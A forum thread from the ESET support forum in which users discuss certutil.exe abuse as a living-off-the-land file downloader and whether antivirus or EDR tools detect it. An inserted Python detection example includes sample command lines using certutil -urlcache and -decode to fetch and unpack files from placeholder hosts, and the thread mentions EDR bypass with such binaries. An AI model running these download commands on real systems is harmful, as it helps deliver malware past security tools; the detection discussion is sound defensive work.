czesetfan 43 Posted April 15, 2024
An interesting question was asked on that link: Is there a way to configure ESET to detect such LoL bin usage? Would it be possible?
Administrators Marcos 5,730 Posted April 15, 2024
ESET will not block powershell, java.exe, certutil.exe or whatever script interpreter or legitimate application just because it can be used to download both legit and malicious files. If the downloaded file was malicious, there's a very good chance it would be detected by ESET. Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files, for instance.
itman 1,921 Posted April 15, 2024
The certutil.exe abuse shown in the YouTube video is detailed here: https://bdure.medium.com/lets-defend-suspicious-certutil-exe-usage-eventid-113-93e379611663 . Also, the attack has been well known for some time:

> In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsrv32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file. This is not completely surprising since certutil has remote capabilities, but it's clearly not checking the format of the file — effectively turning certutil into LoL-ware version of curl. As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time. So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.
> https://www.varonis.com/blog/the-malware-hiding-in-your-windows-system32-folder-part-iii-certutil-and-alternate-data-streams

Eset could create an internal HIPS rule to scan for such command line usage of certutil.exe.
Edited April 15, 2024 by itman
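A command-line check of the kind the HIPS rule suggested above would need, run over constructed process-creation records; this is an added example, not code from the thread, from ESET or from the linked articles. The record format, the switch sets treated as download/decode use, and the example.invalid hosts are assumptions.

```python
"""Flag certutil.exe command lines that fetch or decode files, the pattern a
HIPS/EDR rule would key on. Records below are constructed; example.invalid is a placeholder host."""
import re
import shlex

# Switches that make certutil a downloader/decoder. Assumption: '-' or '/' form.
DOWNLOAD_FLAGS = {"-urlcache", "-verifyctl"}
DECODE_FLAGS = {"-decode", "-decodehex", "-encode"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def _tokens(command_line: str) -> list:
    """Split a Windows command line; switches become lower-case '-x' form."""
    try:
        parts = shlex.split(command_line, posix=False)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        parts = command_line.split()
    parts = [p.strip('"') for p in parts]
    return ["-" + p[1:].lower() if p[:1] in ("-", "/") else p for p in parts]

def classify_certutil(command_line: str):
    """Return a finding label for a suspicious certutil invocation, else None."""
    toks = _tokens(command_line)
    exe = toks[0].lower().replace("\\", "/").rsplit("/", 1)[-1] if toks else ""
    if exe not in ("certutil", "certutil.exe"):
        return None
    flags = {t for t in toks[1:] if t.startswith("-")}
    has_url = any(URL_RE.match(t) for t in toks[1:])
    if flags & DOWNLOAD_FLAGS and (has_url or flags & {"-f", "-split"}):
        return "certutil_download"
    if flags & DECODE_FLAGS:
        return "certutil_decode"
    return None  # -hashfile, -dump, -store, -verify: normal admin use

def scan_log(text: str) -> list:
    """Parse 'timestamp | user | command line' records; return (ts, user, label)."""
    hits = []
    for line in text.strip().splitlines():
        ts, user, cmd = (f.strip() for f in line.split("|", 2))
        label = classify_certutil(cmd)
        if label:
            hits.append((ts, user, label))
    return hits

SAMPLE_LOG = r"""
2024-04-15T10:01:02Z | CORP\alice | certutil -urlcache -split -f http://files.example.invalid/setup.exe setup.exe
2024-04-15T10:03:11Z | CORP\bob | certutil.exe -hashfile C:\Users\bob\Downloads\setup.exe SHA256
2024-04-15T10:05:40Z | CORP\bob | certutil /DECODE C:\Users\bob\AppData\Local\Temp\blob.txt C:\Users\bob\AppData\Local\Temp\p.dll
2024-04-15T10:07:09Z | CORP\carol | "C:\Windows\System32\certutil.exe" -verifyctl -split -f https://cdn.example.invalid/a.bin
2024-04-15T10:08:30Z | CORP\dave | powershell.exe -Command Get-Date
"""
```

The benign `-hashfile` record and the non-certutil record produce no hit, which is the false-positive control a rule like this needs before it is enforced.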
itman 1,921 Posted April 15, 2024
> 1 hour ago, Marcos said: Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance.

Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.
Administrators Marcos 5,730 Posted April 15, 2024
> 8 minutes ago, itman said: Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.

Yes, if the downloaded file was malicious I'd expect it to be detected.
itman 1,921 Posted April 15, 2024
> 1 hour ago, Marcos said: Yes, if the downloaded file was malicious I'd expect it to be detected.

Which means if the file was 0-day malware, you're nailed.
itman 1,921 Posted April 16, 2024
In regard to deploying certutil.exe to bypass EDR security solutions, this article: https://bishopfox.com/blog/edr-bypass-with-lolbins is worth a read. In a nutshell, just deploy another Win LOL binary.
itman 1,921 Posted April 16, 2024
Using one of the LOLbins Project examples for certutil.exe, I ran it as a standard user from the command prompt. It ran w/o issue. Of note, the downloaded file had no MotW status associated with it. This means it would not be Microsoft Defender cloud scanned. Also, no SmartScreen detection. The only thing displayed was a UAC alert to elevate to admin, since the .exe is an installer, with the alert noting untrusted publisher status.
Edited April 16, 2024 by itman
czesetfan 43 (Author) Posted April 24, 2024
Doesn't this current testing just point to the questions in this topic? https://avlab.pl/en/protection-effectiveness-of-edr-solutions-against-internet-threats/
itman 1,921 Posted April 24, 2024
> 3 hours ago, czesetfan said: Doesn't this current testing just point to the questions in this topic?

As far as malware sourced LOL bin use observed on their honeypot (I assume) for March (?):

what                     count
cmd.exe                   3609
svchost.exe               2154
sc.exe                     765
rundll32.exe               747
iexplore.exe               735
tor.exe                    718
consent.exe                630
schtasks.exe               563
wmiprvse.exe               363
PhoneExperienceHost.exe    357
powershell.exe             296
reg.exe                    153
wscript.exe                129
taskkill.exe               103
msbuild.exe                 80
ping.exe                    56
control.exe                 40
wmic.exe                    40
csc.exe                     26
regsvr32.exe                16
dism.exe                    15
conhost.exe                 13
taskhost.exe                13
net1.exe                     8
attrib.exe                   5
msiexec.exe                  5
certutil.exe                 4
mshta.exe                    2
cscript.exe                  1

No indication of how many of these samples, if any, were used in the March test. BTW - ESSP and Panda were the only tested products that missed a tested malware sample.
Edited April 24, 2024 by itman